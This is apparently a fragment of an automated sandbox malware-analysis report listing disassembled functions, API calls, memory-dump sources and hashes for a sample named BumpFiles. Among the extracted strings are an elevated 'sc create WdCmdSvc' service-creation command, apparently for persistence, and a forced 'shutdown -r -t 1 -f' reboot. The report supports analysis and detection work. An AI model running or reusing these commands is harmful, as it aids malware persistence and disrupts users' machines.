                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
                                                                    • Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
                                                                    • Opcode Fuzzy Hash: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
                                                                    • Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EDC40 Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCapture.USER32 ref: 005EDC66
                                                                    • IsWindowUnicode.USER32(00000000), ref: 005EDCA9
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDCC4
                                                                    • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 005EDCE3
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005EDCF2
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005EDD03
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDD23
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                    • String ID:
                                                                    • API String ID: 1994056952-0
                                                                    • Opcode ID: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
                                                                    • Instruction ID: be34951a36e43789f3af398a6a51a07d0984e7834307d8855864e108d5b23d24
                                                                    • Opcode Fuzzy Hash: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
                                                                    • Instruction Fuzzy Hash: 64219C75204649AF9624FA5ACE80FAB77ECAF94350B245429B99EC7242DA54FC40C734
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405EE4 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
                                                                    • Instruction ID: effb08d611f5e391307ffa91fb3e4cdf484130bf0c3f56b27be3f07da332bfd1
                                                                    • Opcode Fuzzy Hash: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
                                                                    • Instruction Fuzzy Hash: 25C133B2710A014BE714AA7D9C8476FB286DBC5325F18823FE215EB3D6DA7CCC558B48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004089AC Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00408E38: GetCurrentThreadId.KERNEL32 ref: 00408E3B
                                                                    • GetTickCount.KERNEL32 ref: 004089E3
                                                                    • GetTickCount.KERNEL32 ref: 004089FB
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408A2A
                                                                    • GetTickCount.KERNEL32 ref: 00408A55
                                                                    • GetTickCount.KERNEL32 ref: 00408A8C
                                                                    • GetTickCount.KERNEL32 ref: 00408AB6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408B26
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
                                                                    • Instruction ID: 04830d6e1a5b1c73318a558b7da50ef5df90f6e1ef99aac74cb934d5c1ef7327
                                                                    • Opcode Fuzzy Hash: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
                                                                    • Instruction Fuzzy Hash: 4C4183706083419ED721AE7CCA8431BBAD1AF90354F14897FE4D8977C1EF7898818B5B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004C277C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(D*L,00000004,004C0A6C,00000000,004C2852,?,?,004C0A6C,00000001), ref: 004C27F4
                                                                    • GetCurrentThread.KERNEL32 ref: 004C282C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004C2834
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$ErrorLast
                                                                    • String ID: D*L$XhI$j$L
                                                                    • API String ID: 4172138867-1428119162
                                                                    • Opcode ID: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
                                                                    • Instruction ID: f9aeef6c056601da72b3f208aefed89395b05af5cb72de4651f15a5c40964890
                                                                    • Opcode Fuzzy Hash: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
                                                                    • Instruction Fuzzy Hash: 652144749042516ED301EB718981BAABBE4AF49304F40863FE41497781DBB89804C3A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633BD8 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
                                                                    • API String ID: 587946157-4108604376
                                                                    • Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
                                                                    • Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00424F1C Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F71
                                                                    • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000), ref: 00424F7C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424FC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                    • String ID:
                                                                    • API String ID: 2927643983-0
                                                                    • Opcode ID: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
                                                                    • Instruction ID: 5c947acfd31bbea33cc86f869339239041117c0650a59772c713c8785221c661
                                                                    • Opcode Fuzzy Hash: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
                                                                    • Instruction Fuzzy Hash: 3F11B97274A2752AF53020697E85F7B1104CBC2768FBB0527F955E67D1D0DC4981906E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406230 Relevance: 9.1, APIs: 6, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00406252
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00406258
                                                                    • GetStdHandle.KERNEL32(000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406277
                                                                    • WriteFile.KERNEL32(00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040627D
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406294
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 0040629A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 3320372497-0
                                                                    • Opcode ID: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
                                                                    • Instruction ID: 94914c835da9b27d9f252367b9cb564e513d0c16cad5d0b6ae95a77a31fa9b96
                                                                    • Opcode Fuzzy Hash: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
                                                                    • Instruction Fuzzy Hash: 9C0162A12057103DE610B3BA9D86F5B269CCF06728F10467E7114F61D2C57C48148FBA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A1F
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A63
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
                                                                    • Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0063586C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21sleepprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                    • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                    • Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$Exec
                                                                    • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
                                                                    • API String ID: 1325486322-1912651170
                                                                    • Opcode ID: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
                                                                    • Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
                                                                    • Opcode Fuzzy Hash: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
                                                                    • Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005ECAF4 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumWindows.USER32(005EC9E8,00000000), ref: 005ECB32
                                                                    • ShowWindow.USER32(?,00000000,005EC9E8,00000000), ref: 005ECB74
                                                                    • ShowOwnedPopups.USER32(00000000,?), ref: 005ECBA3
                                                                    • ShowWindow.USER32(?,00000005), ref: 005ECC18
                                                                    • ShowOwnedPopups.USER32(00000000,?), ref: 005ECC47
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                    • String ID:
                                                                    • API String ID: 315437064-0
                                                                    • Opcode ID: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
                                                                    • Instruction ID: 520c65952f6602bae8faae5d5e0a6eb63dfcaab99f1881edca88c48e5b972915
                                                                    • Opcode Fuzzy Hash: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
                                                                    • Instruction Fuzzy Hash: D5418431604B818FD724DB3AC489BAA7BE6FB84714F550969E4ADC72E1C734EC82DB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00C11113 Relevance: 7.5, APIs: 5, Instructions: 43timethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C1113A
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00C11149
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C11152
                                                                    • GetTickCount.KERNEL32 ref: 00C1115B
                                                                    • QueryPerformanceCounter.KERNEL32(00000000), ref: 00C11170
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000004.00000002.3857284985.0000000000C10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857351553.0000000000C13000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_c10000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 1978eb5d524df979f0649b318542c6ffedecbfdd20f5e9a4de92fd34d0bdfabf
                                                                    • Instruction ID: 71d54a1eb8ecaa77f43db4c348208384b0789f2eeb0347464b633535fc236b3e
                                                                    • Opcode Fuzzy Hash: 1978eb5d524df979f0649b318542c6ffedecbfdd20f5e9a4de92fd34d0bdfabf
                                                                    • Instruction Fuzzy Hash: 2711B375D10208EBDB10DBA4DA487DEBBF8FB0E355F518895D511E7110D634DB10DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042547C Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC
